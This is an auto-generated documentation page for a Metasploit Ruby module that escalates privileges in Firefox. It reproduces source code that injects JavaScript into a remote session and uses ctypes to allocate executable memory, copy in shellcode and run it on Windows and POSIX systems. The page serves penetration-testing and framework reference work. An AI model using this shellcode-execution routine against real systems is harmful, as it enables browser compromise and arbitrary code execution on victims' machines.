adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/FirefoxPrivilegeEscalation.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

703 lines
20 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::FirefoxPrivilegeEscalation
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::FirefoxPrivilegeEscalation";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (F)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">FirefoxPrivilegeEscalation</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::FirefoxPrivilegeEscalation
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span></dd>
</dl>
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="FirefoxAddonGenerator.html" title="Msf::Exploit::Remote::FirefoxAddonGenerator (module)">FirefoxAddonGenerator</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/firefox_privilege_escalation.rb</dd>
</dl>
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#exec_shellcode_source-instance_method" title="#exec_shellcode_source (instance method)">#<strong>exec_shellcode_source</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Puts the shellcode into memory, adds X flag, and calls it The js function throws on error.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#js_exec-instance_method" title="#js_exec (instance method)">#<strong>js_exec</strong>(js, timeout = 30) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Sends the <code>js</code> code to the remote session, which executes it in Firefoxs privileged javascript context.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#js_target%3F-instance_method" title="#js_target? (instance method)">#<strong>js_target?</strong> &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>The user has selected a javascript (non-native) target.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#run_payload-instance_method" title="#run_payload (instance method)">#<strong>run_payload</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>For a javascript payload, this simply returns the payload source For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../JSObfu.html#initialize-instance_method" title="Msf::Exploit::JSObfu#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../JSObfu.html#js_obfuscate-instance_method" title="Msf::Exploit::JSObfu#js_obfuscate (method)">#js_obfuscate</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="exec_shellcode_source-instance_method">
#<strong>exec_shellcode_source</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Puts the shellcode into memory, adds X flag, and calls it The js function throws on error</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>javascript code containing the execShellcode() javascript fn</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 34</span>
<span class='kw'>def</span> <span class='id identifier rubyid_exec_shellcode_source'>exec_shellcode_source</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
var execShellcode = function(shellcode, bytes) {
Components.utils.import(&quot;resource://gre/modules/ctypes.jsm&quot;);
var execPosix = function() {
var RWX = 7, ANON_PRIVATE = 4098;
Components.utils.import(&quot;resource://gre/modules/ctypes.jsm&quot;);
var LIBS = [
&quot;/usr/lib/libSystem.B.dylib&quot;,
&quot;libc.so.6&quot;,
&quot;libc.so&quot;
];
var i, lib;
for (i in LIBS) {
try {
lib = ctypes.open(LIBS[i]);
break;
} catch (e) {}
}
if (!lib) throw new Error(&quot;Could not find lib in [&quot;+LIBS+&quot;]&quot;);
var mmap = lib.declare(&#39;mmap&#39;,
ctypes.default_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* address (NULL here) */
ctypes.size_t, /* num bytes */
ctypes.int, /* PROT_READ OR PROT_WRITE OR PROT_EXEC */
ctypes.int, /* MAP_ANONYMOUS OR MAP_PRIVATE */
ctypes.int, /* fd (0) */
ctypes.int /* offset (0) */
);
var memcpy = lib.declare(&#39;memcpy&#39;,
ctypes.default_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* dest */
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var fork = lib.declare(&#39;fork&#39;,
ctypes.default_abi, /* calling convention */
ctypes.int /* return type */
);
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
var cstr = ctypes.jschar.array()(shellcode);
memcpy(buff, cstr, bytes);
/* there is probably a better way to do this */
var m = buff.toString().match(/&quot;0x([0-9a-fA-F]*)&quot;/);
if (!m) throw new Error(&quot;Could not find address of buffer.&quot;);
if (fork() == 0) {
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
}
};
var execWindows = function() {
var RWX = 0x40, ANON_PRIVATE = 0x1000;
var Kernel32 = ctypes.open(&quot;Kernel32.dll&quot;);
var VirtualAlloc = Kernel32.declare(&#39;VirtualAlloc&#39;,
ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* start address (NULL here) */
ctypes.size_t, /* num bytes */
ctypes.unsigned_long, /* alloc type */
ctypes.unsigned_long /* protection flags */
);
var RtlMoveMemory = Kernel32.declare(&#39;RtlMoveMemory&#39;,
ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* dest */
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var CreateThread = Kernel32.declare(&#39;CreateThread&#39;,
ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */
ctypes.voidptr_t, /* lpThreadAttributes */
ctypes.voidptr_t, /* dwStackSize */
ctypes.voidptr_t, /* lpStartAddress copy */
ctypes.voidptr_t, /* lpParameter */
ctypes.voidptr_t, /* dwCreationFlags */
ctypes.voidptr_t /* lpThreadId */
);
var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX);
var cstr = ctypes.jschar.array()(shellcode);
RtlMoveMemory(buff, cstr, bytes);
var m = buff.toString().match(/&quot;0x([0-9a-fA-F]+)&quot;/);
if (!m) throw new Error(&quot;Could not find address of buffer.&quot;);
var fn = ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16));
CreateThread(null, null, fn, null, null, null);
};
var i, errs = [], fns = [execWindows, execPosix];
for (i in fns) {
try {
fns[i](shellcode);
return true;
} catch(e) { errs.push(e.message); }
}
throw new Error(&quot;All methods failed. Exceptions encountered:\\n[&quot;+errs+&quot;]&quot;);
};
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="js_exec-instance_method">
#<strong>js_exec</strong>(js, timeout = 30) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Sends the <code>js</code> code to the remote session, which executes it in Firefoxs privileged javascript context. The code will be obfuscated if the JsObfuscate datastore option is set to 1 or higher.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>the results that were sent back. This can be achieved through calling the "send" function, or by just returning the value in <code>js</code></p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
23
24
25
26
27
28
29</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 23</span>
<span class='kw'>def</span> <span class='id identifier rubyid_js_exec'>js_exec</span><span class='lparen'>(</span><span class='id identifier rubyid_js'>js</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='op'>=</span><span class='int'>30</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Running the privileged javascript...</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_token'>token</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[[</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>]]</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_js'>js</span> <span class='op'>=</span> <span class='id identifier rubyid_js_obfuscate'>js_obfuscate</span><span class='lparen'>(</span><span class='id identifier rubyid_js'>js</span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_shell_write'>shell_write</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_token'>token</span><span class='embexpr_end'>}</span><span class='tstring_content'>[JAVASCRIPT]</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_js'>js</span><span class='embexpr_end'>}</span><span class='tstring_content'>[/JAVASCRIPT]</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_token'>token</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_shell_read_until_token'>shell_read_until_token</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[!JAVASCRIPT]</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='int'>0</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="js_target?-instance_method">
#<strong>js_target?</strong> &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the user has selected a javascript (non-native) target.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
&mdash;
<div class='inline'>
<p>the user has selected a javascript (non-native) target</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
152
153
154
155
156
157
158</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 152</span>
<span class='kw'>def</span> <span class='id identifier rubyid_js_target?'>js_target?</span>
<span class='kw'>if</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span>
<span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='const'>ARCH_FIREFOX</span>
<span class='kw'>else</span>
<span class='kw'>false</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="run_payload-instance_method">
#<strong>run_payload</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>For a javascript payload, this simply returns the payload source For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>javascript source code that kicks off the execution of the payload</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
142
143
144
145
146
147
148
149</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_privilege_escalation.rb', line 142</span>
<span class='kw'>def</span> <span class='id identifier rubyid_run_payload'>run_payload</span>
<span class='kw'>return</span> <span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span> <span class='kw'>if</span> <span class='id identifier rubyid_js_target?'>js_target?</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_exec_shellcode_source'>exec_shellcode_source</span><span class='embexpr_end'>}</span><span class='tstring_content'>
var sc = unescape(&quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_unescape'>to_unescape</span><span class='lparen'>(</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;);
execShellcode(sc, </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_to_a'>to_a</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:46 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink